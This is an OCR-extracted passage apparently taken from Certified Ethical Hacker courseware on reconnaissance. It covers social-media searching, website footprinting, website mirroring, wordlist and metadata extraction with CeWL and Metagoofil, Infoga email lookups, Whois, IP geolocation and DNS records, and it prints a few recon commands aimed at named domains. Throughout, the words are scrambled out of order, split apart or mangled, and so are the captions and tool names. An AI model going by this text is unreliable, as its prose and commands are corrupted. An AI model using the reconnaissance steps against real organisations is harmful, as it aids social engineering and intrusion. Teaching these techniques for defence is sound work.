Mackin ©by E-Comel
Copyright
 ‘Attackers
use thiscommandto

a user
on
search target
mediaplatforms
social

F
Not
Wot Found

Not Found

Figure showing
2.41;Screenshot theresult
ofSherlock
tool

2
Module 170
Page tical andCountermensores
Making by Comet
Copyright©
Social
Searcher
Source:https://www.social-searcher.com
SocialSearcherallowsattackersto searchfor content i n socialnetworksi n real time and
deepdata.this
networking tool
provides analytics Attackersuse to tracka targetu seron
sites and obtaininformationsuchas complete
andotherpersonal
postings, information,
various
social
URLsto their profiles, their

Figure
242:Screenshot
ofSocalSearcher
showing
usercontent
on
socalnetworks

ical andCountermensores
Mackin ©by E-Comel
Copyright
 WebsiteFootprinting

‘acu
Burp
ute, apron,Wappsie,

]
Website Footprinting
(Cont'd) CEH
SSSR
|SCUM ||SESE

Website Footprinting
So far,we have discussedfootprinting through search engines,web services, and social

networking
sites.will website
first place organization's
website
Hereafter, we discuss footprinting.
An isthe
to getsensitive informationsuchas names andcontact detailsof the leadersof the
upcomingprojectdetails,
organization, andso on.

2
Module 172
Page ical andCountermensores
Mackin
©
by
Copyright E-Comel
 section covers the websitefootprinting
‘This mirroringwebsites,
concept, website
extracting
informationand links,gathering metadataof publicdocuments,
wordlists,extracting and
monitoring web updates andwebsitetraffic.
Websitefootprinting refersto monitoring and analyzing a targetorganization's websitefor
information.An attackercan build a detailed mapof a website'sstructure and architecture
theIDSor arousingthe suspicionof any system
without triggering administrator.Attackersuse
sophisticatedfootprinting
toolsor the basictoolsthat come with the operatingsystem, suchas

a
Telnet,or browser.
TheNetcrafttool can gather websiteinformationsuchas IP address, registered
name and

of OS
addressof thedomainowner, domainname, host the site,and details. However, thetool
maynot give all thesedetailsfor everysite. In suchcases,the attackercan browsethe target
website.
thetargetwebsitewill typically
Browsing providethefollowinginformation:
Software
‘=
usedandits version:Anattackercan easily
findthe software
andversion in use
on an off-the-shelfsoftware-based
website.
Operating used:Usually,
system theoperating
system
i n use can alsobedetermined.
Sub-directories
andparameters:Searches
can reveal
thesub-directories
andparameters
bymaking whilebrowsing
a note of the URLs the targetwebsite.
Filename,path, databasefield name, or query:Theattackerwill often carefully analyze
anythingafter2 querythat lookslike a filename, path,databasefieldname, or queryto
checkwhetherit offersopportunities for SQLinjection.
Scripting
one can easily Withofscript
platform: thehelp
determinethe scripting
filename
platform
extensions suchas .php,
or
.asp, isp,
that the targetwebsiteis using.
Technologies Used: Byinspecting the URLsof the targetwebsite, one can easily
determinethe technologies
(.NET,
J2EE, etc.)usedto buildthat website,
PHP,
ContactdetailsandCMSdetails:Thecontact pagesusually offer detailssuchas names,
phone numbers, email addresses,and locationsof admin or support personnel. An

attacker
use
to details
the social
can
URLrewriting engineering
attack.
these
software
to perform
disguisescript
CMS
filenameextensionsif theattackeris willing
efforttowarddetermining
additional platform.
the scripting
allows
to devote

use Burp
‘Attackers Suite,Zaproxy,
WhatWeb,
BuiltWith,
Wappalyzer,
andWebsiteInformerto
that provide:
view headers

=
Connection
content status and
andLast-Modified
Accept-Ranges information
type

=
X-Powered-By
information.
Webserver i n use andits version

ical andCountermensores
Mackin ©by E-Comel
Copyright
Burp
Suite
Source:https://portswigger.net
BurpSuite is an integrated platform for performing securitytestingof web applications.Its
various toolsworktogether to supportthe entire testingprocess, frominitialmappingand
analysisof a n application's
attacksurfaceto finding andexploitingsecurityvulnerabilities.
BurpProxy a llowsattackers
targetwebapplication
application-related
t o all and
intercept requests responses between the
browser
andthe
andobtaininformationsuchas webserver used,its version, andweb-
vulnerabilities.

Tota rset eee]

[Gee
renter [wesc natn [onto |

Fora

Sram Pas
‘ee
[ews
_)
[re]
(awa

Websitefootprinting
of
can be performed
2.43:
Figure Screenshot
BurpSuite
byexaminingHTMLsource codeandcookies.
‘=

HTMLsource
the
Examining
gather
Attackerscan
code
sensitive informationbyexaminingthe HTML source codeand

following
comments
the
comments
The
provide
arewhat
provide manually
clues
may thoseCMS
that
creates.
background.
may
inserted
as to is runningi n the
contact detailsof thewebdeveloper
or administrator.
or that the system
They even

file structure.
will
Observeall the linksandimagetagsto mapthe system

works,Itis sometimespossible to edit the source code

This revealthe
existence of hiddendirectoriesand files. Enter fakedata to determinehowthe script

ical andCountermensores
Mackin ©by E-Comel
Copyright
Examining
Cookies
2.44: sou
Figure Screenshotshowing
HIML

To determinethe software set bythe

one can examine cookies
runningand its behavior,
server.Identify platforms
the scripting byobservingsessions and other supporting
cookies.Theinformation aboutcookie name, value,anddomainsize can also be
extracted.

2.45:Screenshot
Figure showingcookies

ical andCountermensores
Mackin ©by E-Comel
Copyright
 WebsiteFootprinting
using WebSpiders

‘eae
orton
end raed by et

WebsiteFootprinting
usingWebSpiders
A web spider
browses
(also
websites
knownas
in a methodical
andemailaddresses.
webcollect
manner to
crawleror web robot)
specific
is a program or automatedscript
information
suchasemployee
Attackersthen use the collectedinformationto perform
that
names
footprinting and
socialengineeringattacks.Web spidering failsif thetarget
websitehasthe robots.txtfile i n its
root directory
with a listing
of directoriesto preventcrawling.
Attackerscan uncover all the filesandweb pages on the targetwebsitebysimply feeding the
web spider
andanalyzes
witha URL.Then, the web
spider
sendshundreds
the HTMLcadeof all the receivedresponsesfor identifying
rnew linksare found, thenthe spider
to
of requeststhe targetwebsite
additionallinks.If any
addsthemto the targetlist andstarts spidering and
analyzingthe newly discoveredlinks.Thismethodhelps attackersto not onlydetectexploitable
web pages,and filesthat makeup the
surfacesbut alsoto find all the directories,
‘web-attack
target
website,
Spidering
User-Directed
Attackers,
i n some cases,use a more sophisticated technique for spideringthe target
website
Insteadof usingautomatedtools.They u se standardwebbrowsers to walkthrough the target
‘website
Whileperforming to
in a n attempt navigate through allthefunctionalitiesprovided
this task,the resulting
monitoredand analyzed
bythewebapplication
incomingand outgoingtrafficof the websiteis
bythe tools that includefeaturesof both a web spider and an
intercepting proxy.Further,
URLsvisited bythe browser.It alsoanalyzes
mapwith thediscovered
of
thesetoolscreate a map the webapplication
the responsesof the application
content andits functionalities.
Attackers
ofallthe
consisting
and updates
use toolssuchas Burp
the
Suite
andWebScarab to perform user-directedspidering

ical andCountermensores
Mackin ©by E-Comel
Copyright
Webspidering toolssuchas WebDataExtractor, andSpiderFoot
ParseHub, can collectsensitive
informationfromthe targetwebsite.
=
Webbata Extractor
Source:http://www.webextractor.com
Web Data Extractorautomatically extracts specific
informationfrom web pages.It
extracts targeted phone,
contact data(email, andfax)fromthe website,extractsthe URL
keyword)
and meta tags(title,description, for websitepromotion,searches directory
web research,
creation, performs andso on.
showni n
‘As the screenshot, gather
attackersuse WebData Extractor to automatically
criticalinformationsuchas listsof meta tags,e-mailaddresses,and phone
and fax
numbersfromthe target website.

2.46:Screenshotof
Figure WebDataBxractor

ical andCountermensores
Mackin ©by E-Comel
Copyright
 EntireWebsite
Mirroring

youteto
web
Siondowland

EntireWebsite
Mirroring
Websitemirroring
duplicate
websites
is
of
the processof creating
usingmirroringtoolssuchas HTTrack
a replica
or clone the original
WebSiteCopier
Thesetoolsdownloada websiteto a localdirectory
andNCollectorStudio.
and recursively
website.Usersc an

build all the directories

including
HTML,
‘Website
has
mirroring
the
following
other
images,flash,
videos,and files fromthe webserver
benefits:
on anothercomputer.

=
Itis
It
helpful
for
offline browsing
site
enablesan attackerto spend
m ore time in viewing and analyzing
the websitefor
andloopholes
vulnerabilities
=
It helpsi n finding structure and other valuableinformation
the directory from the
mirroredcopy without multiple
requests to thewebserver
Attackerscan use this informationto perform
various web application
attackson the target

organization's
website.
Mirroring
‘Website WebSiteCopier
Tool:HTTrack
Source:http://www.httrack.com

utility.
HTTrackis
and recursively websiteto
an offlinebrowser It downloads
a fromtheInternet a localdirectory
HTML,images,andotherfilesfromthe web
buildsall the directoriesincluding
server
computer.
on another

As showni n the screenshot, attackersuse HTTrackto mirror the entire websiteof the target
organization,store it i n the localsystem drive,andbrowsethe localwebsiteto identify possible
exploits
andvulnerabilities.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Mirroring
target
website

Figure
2.47:
of
Track
Screenshot Web

2
Module 179
Page tical andCountermensores
Making by Comet
Copyright©
 WebsiteInformationfrom https://archive.org
Extracting
(©InvernetArchive's
Wayback
Machine
allows one tovit archived
of
versions webster

Extracting Website Information from https://archive.org

Source:https://archive.org
Archiveis an InternetArchiveWayback Machinethat explores archivedversions of websites.
Suchexploration allowsan attackerto gather informationo n a n organization's
web pagessince
its creation, Asthe website https://archive.orgkeepstrackof web pagesfromthe time oftheir
creation, a n attackercan retrieve even informationremovedfromthe target website,suchas
web pages,audio files,video files,images,text, and softwareprograms.Attackersuse this
informationto perform phishing and other typesof web application attackson the target
organization.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ss
ORME
[caren]

Uk
Auntaninianenene
Pt sl
248:
Figure Screenshot showing
ofArchive archived
versions ofmicrosoft.com

Now$799

Figure2.49:
Screenshot
ofArchive
showingarchived
webpages
ofmicrosoft.com

2
Module 381
Page ical andCountermensores
Mackin
©
Copyright
by E-Comel
 WebsiteLinks
Extracting

Netpeak
Cctoparse, and UnkEaton
spider, to

WebsiteLinks
Extracting
Extracting
a target of
websitelinksis an important
websiteto determine
part website footprinting,
i ts internal
attackercan find out the applications,
andexternallinks.Using
web technologies,
wherean attackeranalyzes
thegathered information,
an
andother relatedwebsitesthat are
linked to the targetwebsite.Further, dumping the obtainedlinkscan reveal important

helps andURLs
of such
connections extract
as and
attackersto identify
application
CSS
Thisotherresources
vulnerabilitiesi n the target
JavaScript files. information
websiteandfind ways to exploit
theweb

Attackerscan use various onlinetoolsor services suchas Octoparse, Netpeak Spider,

andLink
Extractorto extract linkedimages,scripts, iframes, URLs,etc.,ofthetargetwebsite.Usingthese
tools,about
alsobacklinks
perform website,
a n attackercan
Usefulinformation
extract
exploitation. important
the targetto
to a target
further
whichcan provide and

*
Octoparse
Source:https://www.octoparse.com
Octoparse as it quickly
offersautomatic dataextraction, scrapeswebdatawithout coding
andturns webpagesinto structured
data.As showni n the screenshot,attackersu se
Octoparse
code. to informationfrom
capture
webpages,
suchas text, links,
image URLs,
or html

ical andCountermensores
Mackin ©by E-Comel
Copyright
- ee

Figure
250:Screenshot
ofOctopase

ofOctoparse
251:Screenshotshowing output
Figure

ical
Mackin
and
Countermenso
Copyright
by © E-Comel
 Wordlistfromthe Target
Gathering Website
ro ee
brutefor

Spldering.

‘wordfromthetarget
webste

‘the
words
wobste:
avalabeon thet

@Q
Wordlistfrom the Target
Gathering Website
Thewordsavailableon the targetwebsitemay revealcriticalinformationthat helps attackersto
performfurtherexploitation. Attackersgather a list of emailaddresses relatedto the target
usingvarious searchengines,socialnetworking
organization sites,webspidering tools,etc. After
obtaining
theseemail addresses, can gather
an attacker a list of wordsavailableon the target
website.Thisinformationhelps the attackerto perform brute-forceattackson the target
An attackeruses the CeWLtool to gather
organization. a listof wordsfromthe targetwebsite
andperform a brute-forceattackon the emailaddresses gathered earlier.

=
CeWL
To run the
tool,
ruby cewl.rb
issue

--help
the following
commands:

This
command
various
the target that
auser alist
website. ofwords
displays options can use to obtain from

cewl www.certifiedhacker.com

This
command
cewl
alist
of inthe
target
URL.
returns unique
wordspresent
--email www.certifiedhacker.com

website
In thiscase, the target is www.certifiedhacker.com, and the ‘--email’
optionis usedto fetcha list ofwordsandemailaddressesfromthe target
website.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 @parrot
‘eoul_www.certifredhacker
com
Kew. 5.4.4c1 (Arkanoid) Robin Wood (robingdigi.ninja)
(https://digi
ninja/)
K
ide

Screenshot
Figure252:
showing results
obtainedfromCeWLtoo

2
Module 185
Page tical andCountermensores
Making by Comet
Copyright©
 Metadataof PublicDocuments
Extracting
sett the
information mayresdeon targetorganizations

se
metadata
Webextraction
Ost
‘rackets
Ertoo, and
tos, such& Metagof
Extractor toextractm etadata
a ndden

=) Be
| pdpot
Metagoflextractsthemetadata
ofpublic
‘Metagootitdocument deel docxpts,

MetadataofPublic Documents
Extracting
Useful
information
Microsoft
Word
files, target
filesorganization's
website
mayresideon the

extractdata,
valuable including
andother in various formats.
metadataand hiddeninformationfrom suchdocuments.Thedata mainly
Attackers
in theformof pdfdocuments,

contains hidden
public
information analyzed
aboutthe documents
thatcan be to extractinformationsuchasthe
title of the page,description, creation/modification
keywords, dateandtime of the content, and
usernames ande-mailaddresses of employees
of the target
organization.
An attackercanmisuse this information to perform maliciousactivities againstthe target
bybrute-forcing
organization authenticationusing the usernames and e-mailaddresses of
employees,
or performsocialengineeringto sendmalware, whichcan infectthetargetsystem,
MetadataExtractionTools
Metadataextraction toolssuchas Metagoofil, Exiftool,
andWebDataExtractorautomatically
extract criticalinformationthat includesthe usernames of clients,
operating systems(exploits
are OS-specific), emailaddresses (possibly list of software(version
for socialengineering), and
type)used, listof servers, documentdatecreation/modification,
andauthorsof thewebsite.
=
Metagoofil
Source:https://code.google.com
Metagoofil
extracts metadataof public
belonging It performs
to a targetcompany.
documents
a Google documents
to identify
search
(pdf,doc,xls,ppt,docx,pptx,andxlsx)
anddownloadthe
to the localdiskandthen extracts the metadatawith differentlibrariessuch
Hachoir,
‘as PdfMiner, andothers.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 shownin the screenshot,
‘As Metagoofil
generatesa reportwith usernames,software
versions, and servers or machinenames, which helpsattackersi n the information
gathering
phase. b
metagoofitver 2.2
Christian Martorella
Edge-Securitycom
cnartorella_atedge-security.com
BlackhatArsenalEdition

I-1 starting ontine search

I-1 Searching
for doc files, with a Linit of 200
Searching 100 results
Searching 200 results
Pesults: 4 files. found
Btartingto dovnload50 of then

11/501/vebhp2mt-en
Error downloading
/vebhp2ht=en
[27501/int\/en/ads
Error downloading
/intl/en/ads
[3/50] /services
Error dovnloading
/services
[4/501/int\/en/poticies/
for pdf files,
I-1 Searching vith a Limit of 200
Searching
100 results
Searching
200 results
Results: 34 files found
Bterting to dovnload50 of then
253:Screenshotof Metagoof!
Figure

ical andCountermensores
Mackin ©by E-Comel
Copyright
 OtherTechniques
forWebsiteFootprinting

(a acters ee web
Monitoring
Web
Pages
foran
and
Vuln or
ol, sucht WeSite-Watcher
updates motoring
Updates Changes
to dete changespds in

(0
Actacirs
copyrightweb
can sec

the
detaws
fo ln ar rvion rans ttm arcane to pre

“ocr
Website
se
Tralfic
Target
tools, Company
wate
afrmaton
about
tae
‘Monitoring

mnitorne chs
of

WebStat,Alexa,nd Mont, tocol he tat

Other Techniques
for WebsiteFootprinting
‘=
Monitoring
WebPages for UpdatesandChanges

Attackers
monitor
website changes.
targetwebsitehelps the
the target
attackers
to detectwebupdates
to accessandidentify
pages,track changes
password-protected
and
changes
Monitoring
in the login
pages,extract
i n the softwareversion anddriver updates,
extract and store imageson themodifiedweb pages,andso on. Attackers analyzethe
gathered informationto detectunderlying
vulnerabilitiesi n the targetwebsite,
andbased
on thesevulnerabilities,
they perform ofthe targetwebapplication,
exploitation
WebUpdates
Monitoring
Tools
Webupdates tools are capable
monitoring of detecting
any changes or updates on a
particular andthey
website, can sendnotifications
or alertsto interestedu sersthrough
emailor SMS.
© WebSite-Watcher
Source:https://www.aignes.com
helps
‘Website-Watcher forupdates
to trackwebsites andautomatic changes.
When
update
‘an or change automatically
occurs,WebSite-Watcher detectsand saves the
lasttwo versions onto your disk.
shownin the screenshot,
‘As attackersuse WebSite-Watcher
to extract the olderand
newer versions of web pagesrelatedto the target
website

ical andCountermensores
Mackin ©by E-Comel
Copyright
 258:Screenshot
Figure of Website
Watcher

Searching for ContactInformation, EmailAddresses, and Telephone Numbersfrom

Company Website
Attackerscan searchthe targetcompany’s
websiteto gathercrucial informationabout
Generally,
the company.
use
websites
to
inform
public
what
organizations
do,whattypeof servicesor products theyprovide,
the about they
howto contact them,ete. Attackers

For
this
can exploit information

example,
on company.
to launchfurtherattacks the target

following company's
attackerscan searchfor the informationon the
website:
Company numbers,
contact names,phone andemalladdresses
Company
locationsandbranches

Partner
Information
News
Linksto othersites
Product,project,
or service data

ical andCountermensores
Mackin ©by E-Comel
Copyright
Searching
forWebPages PatternsandRevisionNumbers
Posting
Copyright provided
mechanism
is a protecting bythelawof a country,
whichgrantsthe
creator of an original
workexclusiverights
for its use anddistribution.To restrict third
their data freely,
partiesfrom accessing ensure that there is
most organizations a
Copyright
notice on everysingle pieceof their published
work,
copyright
A typical notice contains thefollowinginformation:
TheCopyright Symbol
©. The
Year
‘The
of
of Creation
Name theAuthor
9
ARights Statement
attacker
‘An
a deep
can search
analysis
forcopyright
of the targetorganization.
therevision numberofa product.
Further, to
noticeson the webanduse thesedetails perform
attackerscan searchandnote down
Therevision number is a uniquestringthat actsas an
identifierforthe revision of a given document, andit can befoundwithinthedocuments
ofthecompany.
can alsosearch
‘Attackers forthedocument numbers
to
thatare assignedthedocuments
after revision, whichcan besearchedfromthe Internetandrecordedto launchfurther
attacks o n the target.
WebsiteTrafficofTarget
‘Monitoring Company
can monitor a targetcompany’s
‘Attackers websitetraffic using toolssuchas Web-Stat,
Alexa,collect
valuable
information.
tools
andMonitisto
help
about the target’s
customers
collect
customer base,
These to
which helpattackersto disguise
and launchsocialengineering
attackso n the target.
information
themselvesas

Theinformation
collected
includes:
©.

Total
visitors:
browsingTools(https://clicky.com) number
suchasClicky
the target
website. of findthetotal visitors

views: Toolssuchas Opentracker

Page (https://www.opentracker.net)
monitor the
total numberof pagesviewedbythe users along
with the timestamps andthe status
of the user on a particular
web page(whetherthewebpage is still active or closed).

Bouncerate: Toolssuchas Google Analytics

(https://analytics.google.com)
measure
the bouncerate of the targetcompany’s
website.
Livevisitors map: Toolssuchas Web-Stat(https://www.web-stat.com)
trackthe
‘geographical
of
location the usersvisitingthe company’s
website,
Toolssuchas Alexa(https://www.alexa.com)
ite ranking: tracka company's
rankon
the web.
geography:
‘Audience Toolssuchas Alexatracka company’s
customer locations
on
the
globe. ical andCountermensores ©
Mackin by E-Comel
Copyright
 (https://goingup.com)
TrackVisitorsand monitor sales:Toolssuchas goingup! track
visitors,monitor sales,
andshowconversation rates withthe company’s
website,

2.55:Screenshot
Figure ofAlexa

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Email Communications
Tracking

the

racers
of
delivery
emails
to

ack eit
an
‘Rese

gather
s ucha
‘ecilen IP adeese,

formcal engineering
and

Qe
Email Footprinting
footprinting
So far,we have discussed searchengines,footprinting
through usingGoogle,
footprinting
social
networking
sites,
footprinting. website will email
through
This section describes
informationfromemailheaders,
and footprinting.
Now,we
how to trackemailcommunications,
andemailtracking
tools.
discuss
how to collect

Email Communications
‘Tracking
Emailtracking
‘through
digitally
time-stamped of is
monitors theemailmessages a particular user. Thiskindof trackingpossible
recordsthat revealthe time anddatewhenthe target receives
andopensa specific
IP addresses,
to builda hacking
thisinformation
tools to
collect
information
email,Emailtracking allowan attacker
mailservers, andservice providers
involvedi n sending
andto perform
strategy
suchas
theemail.Attackerscan use
socialengineeringandotherattacks.
Examples
of emailtracking
toolsincludeeMailTrackerPro,
Infoga,
andMailtrack.

=
System
gathered
Informationaboutthe victim
Recipient's Allowstracking
IPaddress:
tools
usingemailtracking includes:
oftherecipient's
IP address
*
Geolocation:
Estimates and displays
the locationof the recipient
on the mapand may
calculatethedistancefromthe attacker'slocation
even

EmailReceived andRead:Notifiestheattacker whenthe emailis receivedandreadby

the recipient
ReadDuration:Thetime spentbythe recipient i n reading
theemailsent bythe sender
Proxy Detection:Providesinformationaboutthe typeof server used bythe recipient
Links:Checks
whether
thelinkssent to therecipientthroughemailhavebeenchecked

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Operating
System andBrowserinformation:Revealsinformation aboutthe operating
systemandthe browserusedbythe recipient.
Theattackercan use thisinformationto
findloopholes
i n that version of the operating
systemandbrowser
to launch
further
attacks
ForwardEmail:Determines whetherthe emailsent to the user is forwardedto another
person
DeviceType: Providesinformationaboutthe typeof deviceusedto open andreadthe
email,
e.g.,desktop computer, mobiledevice,or laptop

Path
Travelled: emailemail
transfer
Tracks
agents
the paththrough
fromsource to destinationsystem
whichthe traveledvia

Informationfrom Email Header

Collecting
emailheadercontains the detailsof the sender,
‘An routinginformation,addressing scheme,
date, subject,
andrecipient. Emailheadersalsohelp
an emailbeforeit is deliveredto the recipient.
for a n attackerto launchattacksagainst
to
attackerstrace the routingpath

of
takenby
Eachemailheaderis a usefulsource information
the target.The processof viewingthe emailheader
varies with differentemailprograms.
Commonly usedemailprograms:
=

Client
eM Spike
=

Mailbird
Lite ClawsMail

ThunderbirdSmarterMail
Webmail
=
Hiri
=

Mozilla
Theemailheadercontains the following
information:
Outlook

Sender's
=
mail originator’s
server
bythe
Dateandtime of receipt emailservers
=
Authentication
system by
used the mailserver
sender's
Data

=
time
Aunique
of sending
and
number
the message
assigned
bymx.google.com
to identify
the message
=

‘=
full
Sender's
Sender'sIPaddress
name
andaddress fromwhichthe message
was sent

byperforming
Theattackercan trace andcollectall this information of the
a detailedanalysis
complete
emailheader.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Date
time
by
f=)
ad received
=

the emai
eres
exgintors

. _S~Sender's mail
server

(Gaceenamine
nant
——
bys
patentcationem
sanded
aed
m al lserver

Jsenderstuitname

Figure showing
2.56:Screenshot detailed
analysis
oftheemailheader

2
Module 196
Page tical andCountermensores
Making
byComet
Copyright©
 Tools
Email Tracking

| eMaitracartro
anaes emai a ndrevealsinformation,
headers sch a sender’
geographical
IP
eationand addess

Email Tracking
Tools
Emailtracking
toolsallowan attackerto track an emailandextract informationsuchas sender
identity,
mailserver, sender’s location,andso on. Thesetoolssendnotifications
IP address,
automatically openthe mailandprovide
whenthe recipients status informationaboutwhether
the emailwas successfully
targetorganization's
systems delivered
or
bysendingnot. extracted
information
Attackers
malicious the
use the
emails
to attack

+
Infoga
Source:https://aithub.com

Infoga isa toolusedforgathering emailaccountinformation(IP,hostname,

country,etc)
fromdifferentpublic sources (search
engines,pgp keyservers, andShodan),
andit checks

2 report
was
using
if an email leaked
pythoninfoga.py --domain
thehaveibeenpwned.com

../microsoft. txt
microsoft.com API. the
For example,command
--source all --breach -v

will retrieve all the publicly available email addressesrelated to the domain
microsoft.com along withemailaccount information.
python infoga.py mé110k¢protonmail.com
../mélik.
--info --breach -v 3
report txt

willemail
account
information
Theabovecommand retrieve
specified
address fora email

ical andCountermensores
Mackin ©by E-Comel
Copyright
eMailTrackerPro
Source:http://www.emailtrackerpro.com
shownin the screenshot,
‘As attackersuse eMailTrackerPro to analyze
emailheadersand
extract informationsuchas the
sender’s
geographical location,IP address,
allowsan attackerto review the traces laterbysaving pasttraces.
andso on. It

Pe a
Figure2.8:Screenshot
ofeMairackerro

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Whois Lookup

‘Waste
query return
Regional
Internet Registries
‘auRs)

Whois Lookup
(Cont'd)

Whois Footprinting
Gathering
network-relatedinformation such as “Whois―
information about the target
organization an attack. In this section,we will discuss
is importantwhen planning Whois
footprinting, i n gathering
whichhelps domaininformationsuchas informationregarding
the
owner of an organization,
its registrar, details,its
registration and contact
name server,
information.Whoisfootprinting o n how to perform
focuses a Whoislookup,
analyze the Whois

ical andCountermensores
Mackin ©by E-Comel
Copyright
lookup andfindIP geolocation
results, as well as the toolsusedto gather
information, Whois
information.
Whois Lookup
Whoisis a query and responseprotocol usedfor queryingdatabases that store the registered
Usersor assignees of an Internet resource, suchas a domainname, an IPaddressblock,or an
autonomous system. This protocol listensto requests o n port 43 (TCP). Regional Internet
Registries(RIRs)maintain Whois databases, whichcontain the personal information ofdomain
owners. For eachresource, the

information(creation andexpiration
Whois
resource itselfandrelevantinformation
databaseprovides
regarding
dates).
text records
assignees,
with informationaboutthe
registrants,andadministrative

Twotypesof datamodelsexistto store andlookup

Whoisinformation:
=
ThickWhois Storesthe complete
-

Whoisinformationfrom all the registrars

for a

‘=
set
particular of data.
-
Whois
Thin only
Stores
Whois
server
the name of the of of a domain,
theregistrar which
holds
in turn
complete onthe details databeing
lookedup.

‘Whois
the
following
name
+
queryreturns
Domain
information:
details

details
*

name
+
Contact
Domain
of thedomainowner
servers
+
NetRange
+
Whena domainhasbeencreated
+
Expiry
records
+

last
Recordsupdated
attackerqueries a Whoisdatabase
‘An server to obtain information aboutthe targetdomain

responds of
name, contact details its owner, expiry date,
to the querywith the requested
create a mapof the organization's
creation date,
information.Using
network,
and so on, andthe Whoisserver
thisinformation,
an attackercan
misleaddomainowners withsocialengineering,
and
thenobtaininternaldetails
Regional
Internet
of the
Registries(RIRs)
network.

TheRIRsinclude:
=
ARIN(American
Registry (https://www.arin.net)
for InternetNumbers)
=
NetworkInformationCenter)
(African
AFRINIC (https://www.afrinic.net)
=
Pacific
APNIC(Asia NetworkInformation (https://www.apnic.net)
Center)
RIPE(Réseaux NetworkCoordinationCentre)
IPEuropéens (https://www.ripe.net)
LACNIC(Latin and
American Caribbean
Network I Center)
nformation
(https://www.lacnic.net)
ical andCountermensores
Mackin ©by E-Comel
Copyright
 Lookup
‘Whois Result
Whoisservices suchas http://whois.domaintools.com
or https://www.tamos.com
can helpto
perform Whois lookups.
Thescreenshotshowsthe result analysisof a Whoislookup
obtained
Whoisservices. Theservices perform
with the two above-mentioned Whoislookupbyentering
the
target's
domain
address.
domaintools.com
as registrant
or
service Whois
provides
IP
information, such
information
The
email,administrativecontact information,
creation andexpirydate,

a including
about an IP address,
hostname,
province, city, phone
number,
informatio
and list ofdomainservers. SmartWhois,availableat http://www.tamos.com,
or domain,
fax number,
information
gives
aboutthe country,
name of the networkprovider,
state or
administrator,
and
technical supportcontact information.It alsohelpsi n finding
the owner of the domain,
the
owner'scontact information,the owner of the IPaddressblock, registered
dateof the domain,
and so on. It supports DomainNames(IDNs),
Internationalized whichmeans one can query
domain
names that use non-English
IPv6
It alsosupports addresses,
characters.

WhoisRecordfor CertifiedHacker.com

Figure
2.59:
of Sereenshot

ical
Whols

andCountermensores
Mackin ©by E-Comel
Copyright
 2.60;Screenshotofsmarts
Figure
Attackersu se Whoislookup tools suchas BatchIP Converter,WholsAnalyzer Pro,and
‘ActiveWhois
information,
DNS
records,
including
country,
city,
and or
to extract informationsuchasIPaddresses,

state,
service providers,administrators,
the
hostnames domainnames,registrant
phone
andfaxnumbers,
and technicalsupportinformation, network
for any IP addressor
domainname.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 IP GeolocationInformation
Finding
1@Ieeolocaton
teglon/state tocode,
cy, 2P/posala5
h elps ident information,
sch county

(hosting
company),
time tne, connection
IP
Speed, dain name 10D country
oe, area code,
modicare, Anderton

Location
Finder,
to in
shoutthe wich
target,intra
information
hep colt geolocation
hep attackers
auncing

IP GeolocationInformation
Finding
IP geolocation helps
to obtaininformationregarding region/state,
a targetsuchas its country,
city,latitudeandlongitudeof itscity,ZIP/postal
code,time zone,connection speed,ISP(hosting
company), domainname, IDDcountry
cartier, andelevation.
area code,
code,
weather
station codeandname, mobile

Using theinformation obtainedfromIP geolocation, an attackermayattemptto gather more

informationabout a targetwith the helpof socialengineering, surveillance, andnon-technical
attackssuchas dumpster diving,hoaxing, or actingas a technicalexpert.Withthe helpofthe
informationobtained,
location,
an attackercan alsoset up a compromised
andif theexact location ofthevictim is detected,
activities andinfectthe victim with malwaredesigned
web server
theattacker
for that specific
the victim's
can perform malicious
area or gain unauthorized
near
accessto the targetdeviceor attempt to launchan attack usingthe targetdevice.
IP geolocation lookup toolssuchas IP2Location, IPLocationFinder, andIPAddress Geographical
Location Finder helpto collectIP geolocation informationabout the target,whichenables
attackers
to launch
social
engineeringattacks andphishing.
suchas spamming
IPGeolocation
=
[P2Location
Lookup
Tools
Source:https://www.ip2location.com
shownin the
‘As screenshot, attackersuse IP2Location tool to identify a visitor's
geographical location, of city,ZIPcode,
region,city,latitudeand longitude
Le., country,
time zone, connection speed, domainname, IDD country
ISP, code,
area code, weather
and usagetypeinformation
station codeand name, mobilecartier, elevation, usinga
proprietary lookup
IP address databaseandtechnology.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 IPAddress

country

city
Coordinates
of
city
\sP

LocalTime

Domain

Net Speed

&
100 Area Code

ZIP
Code
WeatherStation

Figure2.61:
of
Screenshot
IP2Location

2
Module 202
Page tical andCountermensores
Making Copyright©
by Comet
 DNSInformation
Extracting

DNSFootprinting
Aftercollecting
Whoisrecordsaboutthe target,thenext phase
in the footprinting
methodology
isDNS footprinting.
DNSrecords,
Attackersperform DNSfootprintinggather
to
informationabout
andtypesof servers usedbythe targetorganization.
attackersto identify
thehostsconnectedi n the targetnetworkandperform
DNS
servers,
Thisinformationhelps
furtherexploitation
on thetargetorganization.
Thissection describeshowto extract DNSinformation, performthe reverse DNSlookup,
and
collectinformationfromDNSzone transfers,
as well as DNSinterrogation
tools.
DNSInformation
Extracting
DNSreveals information
footprinting
names,
names, computer DNS a about zonedata.DNSzone dataincludeDNSdomain
andmuchmore informationabout network.An attacker
IP addresses,
Uses DNSinformationto determinekeyhosts in the network and then performssocial
gather
engineeringattacksto even more information.
footprinting
DNS helpsdetermining
RecordType
infollowing
about
the records
Des
the targetDNS:

A Pointsto a host'sIPaddress
Mx Pointsto domain's
mailserver
NS
CNAME
tonaming
Points host’s
name

allows
Canonical
aliases
server

to a host
SOA Indicateauthority
for a domain
SRV Servicerecords

ical andCountermensores
Mackin ©by E-Comel
Copyright
 PTR MapsIPaddress
to a hostname
Responsible
person
Hostinformation
recordincludes
CPUtypeand OS
Unstructuredtext records
Table 27:ONS
records
andtheirdeseription
DNSinterrogation tools suchas Professional Toolset(httos://tools.dnsstuff.com) and DNS
Records(https://network-tools.com) enablethe user to perform DNSfootprinting. DNSstuff
(Professional Toolset) extracts DNSinformation aboutIPaddresses, mailserver extensions,
DNS
lookups, Whoislookups, and so on. It can extract a range of IP addressesusing an IP routing
